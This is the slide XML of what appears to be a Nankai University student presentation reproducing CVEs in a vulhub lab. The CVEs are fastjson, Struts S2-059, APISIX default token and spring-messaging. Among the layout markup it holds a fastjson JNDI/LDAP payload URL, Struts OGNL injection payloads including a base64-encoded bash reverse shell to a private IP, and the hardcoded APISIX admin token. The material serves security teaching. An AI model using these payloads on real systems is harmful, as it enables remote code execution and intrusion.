          <a:solidFill>
            <a:srgbClr val="3B3838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1" i="0" u="none" strike="noStrike" cap="none" spc="0" baseline="0">
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:solidFill>
            <a:srgbClr val="3B3838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1" i="0" u="none" strike="noStrike" cap="none" spc="0" baseline="0">
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:solidFill>
            <a:srgbClr val="3B3838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1" i="0" u="none" strike="noStrike" cap="none" spc="0" baseline="0">
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:solidFill>
            <a:srgbClr val="3B3838"/>
          </a:solidFill>
          <a:uFillTx/>
          <a:latin typeface="+mj-lt"/>
          <a:ea typeface="+mj-ea"/>
          <a:cs typeface="+mj-cs"/>
          <a:sym typeface="Calibri" panose="020F0502020204030204"/>
        </a:defRPr>
      </a:lvl9pPr>
    </p:titleStyle>
    <p:bodyStyle>
      <a:lvl1pPr marL="0" marR="0" indent="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Calibri" panose="020F0502020204030204"/>
        </a:defRPr>
      </a:lvl1pPr>
      <a:lvl2pPr marL="723900" marR="0" indent="-2667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Calibri" panose="020F0502020204030204"/>
        </a:defRPr>
      </a:lvl2pPr>
      <a:lvl3pPr marL="1234440" marR="0" indent="-32004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Calibri" panose="020F0502020204030204"/>
        </a:defRPr>
      </a:lvl3pPr>
      <a:lvl4pPr marL="1727200" marR="0" indent="-3556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Calibri" panose="020F0502020204030204"/>
        </a:defRPr>
      </a:lvl4pPr>
      <a:lvl5pPr marL="2184400" marR="0" indent="-3556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Calibri" panose="020F0502020204030204"/>
        </a:defRPr>
      </a:lvl5pPr>
      <a:lvl6pPr marL="2641600" marR="0" indent="-3556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Calibri" panose="020F0502020204030204"/>
        </a:defRPr>
      </a:lvl6pPr>
      <a:lvl7pPr marL="3098800" marR="0" indent="-3556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Calibri" panose="020F0502020204030204"/>
        </a:defRPr>
      </a:lvl7pPr>
      <a:lvl8pPr marL="3556000" marR="0" indent="-3556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Calibri" panose="020F0502020204030204"/>
        </a:defRPr>
      </a:lvl8pPr>
      <a:lvl9pPr marL="4013200" marR="0" indent="-355600" algn="ctr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defRPr sz="2800" b="0" i="0" u="none" strike="noStrike" cap="none" spc="0" baseline="0">
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:solidFill>
            <a:srgbClr val="595959"/>
          </a:solidFill>
          <a:uFillTx/>
          <a:latin typeface="+mj-lt"/>
          <a:ea typeface="+mj-ea"/>
          <a:cs typeface="+mj-cs"/>
          <a:sym typeface="Calibri" panose="020F050202020403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8080/json?poc=%7b%22@type%22:%22org.apache.xbean.propertyeditor.JndiConverter%22,%22AsText%22:%22ldap://127.0.0.1:8085/iosmYQbv%22%7d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19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image" Target="../media/image20.png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24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26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705" y="252095"/>
            <a:ext cx="1214120" cy="1219835"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="内容占位符 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="982663" y="1952625"/>
            <a:ext cx="10226675" cy="1476375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黑体" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
              </a:rPr>
              <a:t>南开大学</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>第五</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
              </a:rPr>
              <a:t>小组</a:t>
            </a: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982663" y="3429001"/>
            <a:ext cx="10226675" cy="11894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南开大学实习实训项目漏洞解析答辩</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>答辩小组成员：侯博文 陆皓喆 郝志成 秦德龙 胡博浩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623" y="313822"/>
            <a:ext cx="7389107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fastjson</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US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远程代码执行漏洞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(CVE-2020-8840)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Calibri" panose="020F0502020204030204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74D956-A8D5-F6DA-C3C0-9A1252E73511}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1053623" y="1180584"/>
            <a:ext cx="6096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本地使用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Yakit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搭建恶意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ldap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服务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49A7E7-A51F-ABE8-53CD-8824A4EBA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23" y="1549916"/>
            <a:ext cx="9544528" cy="20523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8AAB277-F4B5-99A0-B11B-C3FC5EE53EDB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1053622" y="3429000"/>
            <a:ext cx="4467857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访问如下的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url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hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://127.0.0.1:8080/json?poc={"@type":"org.apache.xbean.propertyeditor.JndiConverter","AsText":"ldap://127.0.0.1:8085/iosmYQbv"}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成功弹出计算器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algn="just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最终编写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dockerfile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，整理为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docker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环境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781CA21-7B19-A355-2BAA-A2A8854BE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0293" y="3273743"/>
            <a:ext cx="4467858" cy="302411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98621" y="361948"/>
            <a:ext cx="8557890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Apache Struts S2-059 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US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远程代码执行漏洞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CVE-2019-0230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6646063-4CCB-0892-691A-4C0B168C4A9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53623" y="1073282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Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>漏洞介绍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D282DB-11D2-F428-3236-2D9CEA820952}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="728345" y="1607185"/>
            <a:ext cx="8755380" cy="19234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lstStyle/>
          <a:p>
            <a:pPr marR="0" indent="457200" algn="l" defTabSz="9144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Apache Struts2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框架是一个用于开发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Java EE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网络应用程序的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Web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框架。其中存在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S2-059 Struts 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远程代码执行漏洞（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CVE-2019-0230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），在使用某些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tag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等情况下可能存在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OGNL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表达式注入漏洞，从而造成远程代码执行，影响版本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Apache Struts 2.0.0 - 2.5.20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Calibri" panose="020F0502020204030204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244DF8-0C63-630F-B133-E1144F59432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34096" y="3263582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Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>漏洞复现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5D5AAB-30B9-C717-6933-6B886C9487E2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1053623" y="3775780"/>
            <a:ext cx="843010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vulhub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靶场提供的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环境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 pull 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vulhub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/struts2:2.5.16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51C9DE-7382-7E53-DFBF-5876221F6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8638" y="2829315"/>
            <a:ext cx="3645087" cy="17272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4399C49-7DA2-ABFE-08F9-2DFE9E9CAE03}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1053623" y="4766664"/>
            <a:ext cx="8430102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%{2*2}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可以看到成功解析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1855349-E17F-9106-0A45-329E4D64F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8638" y="4195900"/>
            <a:ext cx="3645087" cy="21098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98621" y="361948"/>
            <a:ext cx="8557890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Apache Struts S2-059 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US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远程代码执行漏洞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CVE-2019-0230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D7A893-560E-E5A7-1E6E-9096347B534D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="728345" y="984885"/>
            <a:ext cx="8755380" cy="19234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lstStyle/>
          <a:p>
            <a:pPr marR="0" indent="457200" algn="l" defTabSz="9144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编写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poc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R="0" indent="457200" algn="l" defTabSz="9144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第一个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post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indent="457200" algn="l" defTabSz="9144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"id":"%{(#context=#attr['struts.valueStack'].context).(#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.setExcludedClasses('')).(#ognlUtil.setExcludedPackageNames(''))}"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marR="0" indent="457200" algn="l" defTabSz="9144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第二个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post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indent="457200" algn="l" defTabSz="9144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"id":"%{(#context=#attr['struts.valueStack'].context).(#context.setMemberAccess(@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)).(@java.lang.Runtime@getRuntime().exec('bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMjIuMzIuMS85MDE1IDA+JjE=}|{base64,-d}|{bash,-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i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}'))}“</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marR="0" indent="457200" algn="l" defTabSz="9144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成功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getshell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Calibri" panose="020F0502020204030204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623" y="313822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Apache APISIX Admin API </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US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默认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Token</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US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漏洞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CVE-2020-13945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)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Calibri" panose="020F0502020204030204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D47016-1A87-A2F8-6E9E-33739FEBC1E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53623" y="1073282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Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>漏洞介绍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39C904-6845-A46E-EC33-868BCD7ADF3A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="728345" y="1607185"/>
            <a:ext cx="8755380" cy="19234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lstStyle/>
          <a:p>
            <a:pPr marR="0" indent="457200" algn="l" defTabSz="9144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Apache APISIX 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是一个动态、实时、高性能的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API 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网关。当使用者开启了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Admin API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，没有配置相应的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IP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访问策略，且没有修改配置文件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Token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的情况下，则攻击者利用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Apache APISIX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的默认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Token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即可访问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Apache APISIX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，从而控制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APISIX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网关。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DA8C38-6B27-E2E8-45E4-B27640CEC89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53623" y="2808534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Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>漏洞复现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2DCD084-8D6E-CF0D-BA69-6244A1029227}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1053623" y="3530600"/>
            <a:ext cx="8430102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vulhub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docker-compose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环境搭建靶机</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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Docker-compose up</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just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其中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APISIX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的默认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token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被硬编码到代码中：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edd1c9f034335f136f87ad84b625c8f1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/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apisix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/admin/routes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路径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post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恶意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代码即可获取命令执行权限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623" y="313822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Apache APISIX Admin API </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US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默认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Token</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US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漏洞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CVE-2020-13945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)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Calibri" panose="020F0502020204030204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F9F7E7F-8AF6-C24B-B0FC-1CA724DD501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53622" y="1119434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Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>漏洞复现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3A9A41-40CF-5027-857D-F1A0586C5037}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="728345" y="1607185"/>
            <a:ext cx="2662555" cy="19234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lstStyle/>
          <a:p>
            <a:pPr marR="0" indent="457200" algn="l" defTabSz="9144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编写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poc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脚本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R="0" indent="457200" algn="l" defTabSz="9144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使用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cmd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参数来执行命令，使用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lscpu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测试命令执行是否成功。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indent="457200" algn="l" defTabSz="9144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R="0" indent="457200" algn="l" defTabSz="9144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可以看到成功执行了命令，返回了结果。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R="0" indent="457200" algn="l" defTabSz="9144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="" xmlns:wpsdc="http://www.wps.cn/officeDocument/2017/drawingmlCustomData" val="200" checksum="59296752"/>
                </a:ext>
              </a:extLst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Calibri" panose="020F0502020204030204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F14ED8-F185-3058-D6DD-F3B58F775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00" y="1019420"/>
            <a:ext cx="7576028" cy="31563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EB74741-A376-8355-7D89-9556DB92C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700" y="4212624"/>
            <a:ext cx="4937399" cy="211183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623" y="313822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spring-messaging</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US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远程代码执行漏洞预警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(CVE-2018-1270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7" name="图形 138"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2346960" y="2197100"/>
            <a:ext cx="7814310" cy="3709035"/>
            <a:chOff x="3745737" y="2499168"/>
            <a:chExt cx="4706946" cy="2035611"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="任意多边形: 形状 141"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3849765" y="2608334"/>
              <a:ext cx="4602918" cy="1926445"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 4602918"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 1926445"/>
                <a:gd name="connsiteX1" fmla="*/ 4602919 w 4602918"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 1926445"/>
                <a:gd name="connsiteX2" fmla="*/ 4602919 w 4602918"/>
                <a:gd name="connsiteY2" fmla="*/ 1926446 h 1926445"/>
                <a:gd name="connsiteX3" fmla="*/ 0 w 4602918"/>
                <a:gd name="connsiteY3" fmla="*/ 1926446 h 1926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918" h="1926445">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4602919" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4602919" y="1926446"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1926446"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:ln w="128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任意多边形: 形状 147"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3745737" y="2499168"/>
              <a:ext cx="4602918" cy="1926445"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 4602918"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 1926445"/>
                <a:gd name="connsiteX1" fmla="*/ 4602919 w 4602918"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 1926445"/>
                <a:gd name="connsiteX2" fmla="*/ 4602919 w 4602918"/>
                <a:gd name="connsiteY2" fmla="*/ 1926446 h 1926445"/>
                <a:gd name="connsiteX3" fmla="*/ 0 w 4602918"/>
                <a:gd name="connsiteY3" fmla="*/ 1926446 h 1926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918" h="1926445">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4602919" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4602919" y="1926446"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1926446"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:ln w="12829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716405" y="1031875"/>
            <a:ext cx="1988185" cy="4921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sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>漏洞描述</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="37" name="组合 36" descr="7b0a202020202274657874626f78223a2022220a7d0a"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1250315" y="1524000"/>
            <a:ext cx="10180414" cy="2221865"/>
            <a:chOff x="5868" y="3651"/>
            <a:chExt cx="7463" cy="3499"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="38" name="图形 138"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="5868" y="3651"/>
              <a:ext cx="7463" cy="3499"/>
              <a:chOff x="3726473" y="2318083"/>
              <a:chExt cx="4739054" cy="2221834"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="39" name="图形 138"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="3843343" y="2601912"/>
                <a:ext cx="4615761" cy="1939288"/>
                <a:chOff x="3843343" y="2601912"/>
                <a:chExt cx="4615761" cy="1939288"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="40" name="任意多边形: 形状 141"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="3849765" y="2608334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1" name="任意多边形: 形状 142"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="3843343" y="260191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42" name="图形 138"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="3798393" y="2556962"/>
                <a:ext cx="4615761" cy="1939288"/>
                <a:chOff x="3798393" y="2556962"/>
                <a:chExt cx="4615761" cy="1939288"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="43" name="任意多边形: 形状 144"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="3804815" y="2563383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4" name="任意多边形: 形状 145"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="3798393" y="2556962"/>
                  <a:ext cx="4615761" cy="1939288"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="connsiteX0" fmla="*/ 4615762 w 4615761"/>
                    <a:gd name="connsiteY0" fmla="*/ 1939289 h 1939288"/>
                    <a:gd name="connsiteX1" fmla="*/ 0 w 4615761"/>
                    <a:gd name="connsiteY1" fmla="*/ 1939289 h 1939288"/>
                    <a:gd name="connsiteX2" fmla="*/ 0 w 4615761"/>
                    <a:gd name="connsiteY2" fmla="*/ 0 h 1939288"/>
                    <a:gd name="connsiteX3" fmla="*/ 4615762 w 4615761"/>
                    <a:gd name="connsiteY3" fmla="*/ 0 h 1939288"/>
                    <a:gd name="connsiteX4" fmla="*/ 4615762 w 4615761"/>
                    <a:gd name="connsiteY4" fmla="*/ 1939289 h 1939288"/>
                    <a:gd name="connsiteX5" fmla="*/ 12843 w 4615761"/>
                    <a:gd name="connsiteY5" fmla="*/ 1926446 h 1939288"/>
                    <a:gd name="connsiteX6" fmla="*/ 4602919 w 4615761"/>
                    <a:gd name="connsiteY6" fmla="*/ 1926446 h 1939288"/>
                    <a:gd name="connsiteX7" fmla="*/ 4602919 w 4615761"/>
                    <a:gd name="connsiteY7" fmla="*/ 12843 h 1939288"/>
                    <a:gd name="connsiteX8" fmla="*/ 12843 w 4615761"/>
                    <a:gd name="connsiteY8" fmla="*/ 12843 h 1939288"/>
                    <a:gd name="connsiteX9" fmla="*/ 12843 w 4615761"/>
                    <a:gd name="connsiteY9" fmla="*/ 1926446 h 19392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15761" h="1939288">
                      <a:moveTo>
                        <a:pt x="4615762" y="1939289"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="1939289"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="4615762" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="4615762" y="1939289"/>
                      </a:lnTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="12843" y="1926446"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="4602919" y="1926446"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="4602919" y="12843"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="12843" y="12843"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="12843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45" name="图形 138"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="3726473" y="2479904"/>
                <a:ext cx="4641447" cy="1964974"/>
                <a:chOff x="3726473" y="2479904"/>
                <a:chExt cx="4641447" cy="1964974"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="46" name="任意多边形: 形状 147"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="3745737" y="2499168"/>
                  <a:ext cx="4602918" cy="1926445"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="connsiteX0" fmla="*/ 0 w 4602918"/>
                    <a:gd name="connsiteY0" fmla="*/ 0 h 1926445"/>
                    <a:gd name="connsiteX1" fmla="*/ 4602919 w 4602918"/>
                    <a:gd name="connsiteY1" fmla="*/ 0 h 1926445"/>
                    <a:gd name="connsiteX2" fmla="*/ 4602919 w 4602918"/>
                    <a:gd name="connsiteY2" fmla="*/ 1926446 h 1926445"/>
                    <a:gd name="connsiteX3" fmla="*/ 0 w 4602918"/>
                    <a:gd name="connsiteY3" fmla="*/ 1926446 h 1926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602918" h="1926445">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="4602919" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="4602919" y="1926446"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="19264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47" name="任意多边形: 形状 148"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="3726473" y="2479904"/>
                  <a:ext cx="4641447" cy="1964974"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="connsiteX0" fmla="*/ 4641448 w 4641447"/>
                    <a:gd name="connsiteY0" fmla="*/ 1964975 h 1964974"/>
                    <a:gd name="connsiteX1" fmla="*/ 0 w 4641447"/>
                    <a:gd name="connsiteY1" fmla="*/ 1964975 h 1964974"/>
                    <a:gd name="connsiteX2" fmla="*/ 0 w 4641447"/>
                    <a:gd name="connsiteY2" fmla="*/ 0 h 1964974"/>
                    <a:gd name="connsiteX3" fmla="*/ 4641448 w 4641447"/>
                    <a:gd name="connsiteY3" fmla="*/ 0 h 1964974"/>
                    <a:gd name="connsiteX4" fmla="*/ 4641448 w 4641447"/>
                    <a:gd name="connsiteY4" fmla="*/ 1964975 h 1964974"/>
                    <a:gd name="connsiteX5" fmla="*/ 38529 w 4641447"/>
                    <a:gd name="connsiteY5" fmla="*/ 1926446 h 1964974"/>
                    <a:gd name="connsiteX6" fmla="*/ 4602919 w 4641447"/>
                    <a:gd name="connsiteY6" fmla="*/ 1926446 h 1964974"/>
                    <a:gd name="connsiteX7" fmla="*/ 4602919 w 4641447"/>
                    <a:gd name="connsiteY7" fmla="*/ 38529 h 1964974"/>
                    <a:gd name="connsiteX8" fmla="*/ 38529 w 4641447"/>
                    <a:gd name="connsiteY8" fmla="*/ 38529 h 1964974"/>
                    <a:gd name="connsiteX9" fmla="*/ 38529 w 4641447"/>
                    <a:gd name="connsiteY9" fmla="*/ 1926446 h 1964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641447" h="1964974">
                      <a:moveTo>
                        <a:pt x="4641448" y="1964975"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="1964975"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="4641448" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="4641448" y="1964975"/>
                      </a:lnTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="38529" y="1926446"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="4602919" y="1926446"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="4602919" y="38529"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="38529" y="38529"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="38529" y="1926446"/>
                      </a:lnTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:srgbClr val="231815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  <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="48" name="图形 138"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="3792167" y="2318369"/>
                <a:ext cx="415557" cy="653420"/>
                <a:chOff x="3792167" y="2318369"/>
                <a:chExt cx="415557" cy="653420"/>
              </a:xfrm>
              <a:solidFill>
                <a:srgbClr val="007BD4"/>
              </a:solidFill>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="49" name="任意多边形: 形状 150"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="3839491" y="2424679"/>
                  <a:ext cx="51371" cy="55224"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="connsiteX0" fmla="*/ 17980 w 51371"/>
                    <a:gd name="connsiteY0" fmla="*/ 55225 h 55224"/>
                    <a:gd name="connsiteX1" fmla="*/ 0 w 51371"/>
                    <a:gd name="connsiteY1" fmla="*/ 11559 h 55224"/>
                    <a:gd name="connsiteX2" fmla="*/ 30823 w 51371"/>
                    <a:gd name="connsiteY2" fmla="*/ 0 h 55224"/>
                    <a:gd name="connsiteX3" fmla="*/ 51372 w 51371"/>
                    <a:gd name="connsiteY3" fmla="*/ 55225 h 5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1371" h="55224">
                      <a:moveTo>
                        <a:pt x="17980" y="55225"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="11559"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="30823" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="51372" y="55225"/>
                      </a:ln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  <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="50" name="任意多边形: 形状 151"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="3792167" y="2318369"/>
                  <a:ext cx="415557" cy="653420"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="connsiteX0" fmla="*/ 287487 w 415557"/>
                    <a:gd name="connsiteY0" fmla="*/ 653420 h 653420"/>
                    <a:gd name="connsiteX1" fmla="*/ 184744 w 415557"/>
                    <a:gd name="connsiteY1" fmla="*/ 587921 h 653420"/>
                    <a:gd name="connsiteX2" fmla="*/ 4942 w 415557"/>
                    <a:gd name="connsiteY2" fmla="*/ 123006 h 653420"/>
                    <a:gd name="connsiteX3" fmla="*/ 65304 w 415557"/>
                    <a:gd name="connsiteY3" fmla="*/ 7419 h 653420"/>
                    <a:gd name="connsiteX4" fmla="*/ 137225 w 415557"/>
                    <a:gd name="connsiteY4" fmla="*/ 6135 h 653420"/>
                    <a:gd name="connsiteX5" fmla="*/ 187312 w 415557"/>
                    <a:gd name="connsiteY5" fmla="*/ 53654 h 653420"/>
                    <a:gd name="connsiteX6" fmla="*/ 228410 w 415557"/>
                    <a:gd name="connsiteY6" fmla="*/ 162819 h 653420"/>
                    <a:gd name="connsiteX7" fmla="*/ 193734 w 415557"/>
                    <a:gd name="connsiteY7" fmla="*/ 162819 h 653420"/>
                    <a:gd name="connsiteX8" fmla="*/ 157773 w 415557"/>
                    <a:gd name="connsiteY8" fmla="*/ 63928 h 653420"/>
                    <a:gd name="connsiteX9" fmla="*/ 126950 w 415557"/>
                    <a:gd name="connsiteY9" fmla="*/ 35674 h 653420"/>
                    <a:gd name="connsiteX10" fmla="*/ 76863 w 415557"/>
